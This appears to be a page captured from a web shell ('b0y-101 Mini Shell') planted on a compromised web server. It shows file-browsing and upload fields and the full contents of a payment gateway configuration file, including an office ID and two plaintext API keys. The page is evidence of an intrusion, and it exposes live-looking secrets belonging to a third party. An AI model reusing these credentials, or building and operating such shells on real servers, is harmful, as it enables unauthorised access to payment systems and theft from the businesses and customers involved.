b0y-101 Mini Shell


Current Path : E:/www/b-group.old/spfin - Copy/paymentall/config/
File Upload :
Current File : E:/www/b-group.old/spfin - Copy/paymentall/config/config.php

<?php
$endpoint = 'https://core.demo-paco.2c2p.com/api/1.0/Payment/prePaymentUi'; 
$officeid = '2206';
$apikey ='7068c343afa741ea978abe75a1b22d51';
$apikey1 ='7068c343-afa7-41ea-978a-be75a1b22d51';
$secretKeyspfin= file_get_contents('../key/spfinpublickey.txt');
$pacoEncryptionPublicKey = file_get_contents('../key/PACOEncryptionPublic.txt');
$pacoSigningPublicKey = file_get_contents('../key/PACOSigningPublic.txt');

$secretkey=$secretKeyspfin;
$pacoencryption=$pacoEncryptionPublicKey;
$pacosigning=$pacoSigningPublicKey;


?>

Copyright © 2019 by b0y-101